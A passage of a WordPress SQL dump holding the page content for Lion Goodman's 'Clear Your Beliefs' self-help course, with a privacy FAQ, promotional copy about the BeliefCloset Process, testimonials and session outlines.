href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:43:37', '2014-06-19 06:43:37', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1036, 2, '2014-06-19 01:08:11', '2014-06-19 06:08:11', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" 